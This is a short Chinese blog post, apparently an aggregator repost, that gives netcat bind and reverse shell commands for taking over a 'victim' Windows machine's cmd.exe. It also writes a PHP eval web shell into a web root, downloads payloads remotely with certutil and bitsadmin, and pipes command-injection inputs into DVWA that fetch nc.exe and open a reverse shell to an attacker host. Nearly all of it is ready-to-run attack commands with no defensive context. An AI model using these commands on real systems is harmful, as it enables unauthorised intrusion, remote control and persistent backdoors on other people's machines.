nc监控实现调用受害者cmd
Posted lighting--
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了nc监控实现调用受害者cmd相关的知识,希望对你有一定的参考价值。
正向连接
受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网
受害者:nc.exe -vlp 1234 -e cmd.exe
攻击者 nc 192.168.1.1 1234
nc -lvvp 80 直接监听内网所有主机80端口
反向连接
受害者 A 出于内网状态 192.168.1.25
攻击者 B 出于内网-外网的服务器 202.12.178.22
受害者 nc.exe -e cmd.exe 攻击者ip 1234
攻击者 nc -vv -l -p 1234
C:\phpStudy\PHPTutorial\WWW\nc.exe
C:\Windows\system32\cmd.exe
echo ^<?php @eval($_POST[‘cmd‘]); ?^>^ >C:\phpStudy\WWW\123.php
远程下载文件
certutil.exe -urlcache -split -f https://www.hack.com/robots.txt C:\phpStudy\WWW\111.php
bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" "C:\phpStudy\WWW\111.php"
通过DVWA命令执行操作完成监听执行cmd
192.168.1.152|certutil.exe -urlcache -split -f http://192.168.1.189/phpStudy/PHPTutorial/WWW/netcat-1.11/nc.exe C:\phpStudy\nc.exe
192.168.1.152|C:\phpStudy\nc64.exe -e cmd.exe 192.168.1.189 82
192.168.1.189监听 nc.exe -lvvp 82
以上是关于nc监控实现调用受害者cmd的主要内容,如果未能解决你的问题,请参考以下文章